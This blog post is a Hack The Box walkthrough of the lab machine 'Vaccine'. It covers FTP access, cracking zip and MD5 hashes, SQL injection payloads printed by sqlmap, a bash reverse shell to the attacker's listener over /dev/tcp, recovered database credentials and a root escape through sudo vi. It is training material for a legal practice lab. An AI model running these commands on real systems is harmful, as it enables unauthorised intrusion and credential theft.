The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

posted on 26.5.2023 by Below Surface in "Hack The Box"

As always: Port scan first (exchange ip with your machines IP address).

sudo nmap -sV ip

Relevant output:

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Let's try to login via ftp with default credentials:

ftp ip
Name: anonymous
Password -> no password, just hit enter!

Success! What can be found here?



-rwxr-xr-x    1 0        0            2533 Apr 13  2021

Let's download that and close the ftp connection:


Now we will use zip2john of the John the Ripper toolbox.

zip2john > hashes


ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Then we can view the hash by:

cat hashes


Now we use a word list to brute force the hash from above.

john -wordlist=/usr/share/wordlists/rockyou.txt hashes


Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (     
1g 0:00:00:00 DONE (2023-05-26 13:37) 33.33g/s 136533p/s 136533c/s 136533C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we can display the password by:

john --show hashes


The password is 741852963. Time to unzip.

password: 741852963


inflating: index.php               
inflating: style.css

Then let's view the content of index.php first:

cat index.php

Relevant output:

if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");

User: "admin", password: "2cb42f8734ea607eefed3b70af13bbd3", though this seems to be a hashed password. We can spot "md5" in the code above, which is a hashing type. Also we can use this command to see possible hash types:

hashid 2cb42f8734ea607eefed3b70af13bbd3

However, this outputs many options. So let's go with MD5.

echo "2cb42f8734ea607eefed3b70af13bbd3" > hash // put the hash into the file
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt // run hashcat

Relevant output:


Since port 80 is open on our machine, let's put the IP address into the browser and use our credentials:

user: admin
password: qwerty789

On the page, we can search for things. Maybe an vulnerable database? Let's use the tool sqlmap for SQL Injection! For this we need to provide the URL and the cookie. We will use the tool cookie-editor (

Cookie-editor, outputs:

Value: manp9gk1dppkl0hh4780bq8ics

The URL is


So the command for sqlmap is the following (please use your machines IP address instead of "ip", and also your own cookie value). If the tool asks to continue or skip, you can just press enter to run the full test.

sqlmap -u 'http://ip/dashboard.php?search=any+query' --cookie="PHPSESSID=manp9gk1dppkl0hh4780bq8ics" 

Relevant output:

[02:07:39] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[02:07:51] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[02:07:51] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[02:08:01] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable  
[02:08:11] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
Parameter: search (GET)                                                                 
    Type: boolean-based blind                                                           
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (9209=9209) THEN NULL ELSE CAST((CHR(104)||CHR(70)||CHR(65)||CHR(116)) AS NUMERIC) END)) IS NULL-- SqFE

    Type: error-based     Title: PostgreSQL AND error-based - WHERE or HAVING clause     Payload: search=any query' AND 9583=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (9583=9583) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- AEZl

    Type: stacked queries     Title: PostgreSQL > 8.1 stacked queries (comment)     Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind     Title: PostgreSQL > 8.1 AND time-based blind     Payload: search=any query' AND 9330=(SELECT 9330 FROM PG_SLEEP(5))-- OGiG ---  

Now we extend the previous command by "--os-shell".

sqlmap -u 'http://ip/dashboard.php?search=any+query' --cookie="PHPSESSID=manp9gk1dppkl0hh4780bq8ics" --os-shell

The terminal now says:


We want to setup a proper reverse shell though, so we open a new terminal window with ncat. First, find out your IP address:

ifconfig tun0 // it is the inet one
ncat -lvnp 443 // start ncat, listening on port 443


Ncat: Version 7.93 ( )
Ncat: Listening on :::443
Ncat: Listening on

Then, within the os-shell window, run the following command (exchange ip with the tun0 inet IP address):

bash -c "bash -i >& /dev/tcp/ip/443 0>&1"

  • press enter

In the ncat terminal, you should have received this output:

Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (1757): Inappropriate ioctl for device
bash: no job control in this shell





Now we got the foothold and will make the shell fully functional:

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

To get the user flag:

cd ~
cat user.txt

Time for privilege escalation.

cd /var/www/html

In dashboard.php we find:

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

Since for some reason the shell sometimes timeouts, we will try to use the open ssh port of the machine now, to get a stable access:

ssh postgres@ip
Fingerprint: yes
Password: P@s5w0rd!

Logged in! What privileges do we have?

sudo -l


Matching Defaults entries for postgres on vaccine:

User postgres may run the following commands on vaccine:     (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

Now, let's open the vi editor as a superuser (more info:

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

In the vi window:

press ":"
type "set shell=/bin/sh"
hit enter
press ":" again
type "shell"
hit enter again
type "bash"

Now you have a bash root shell! Get the flag:

cd ~
cat root.txt


hack the box
john the ripper
sql injection


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box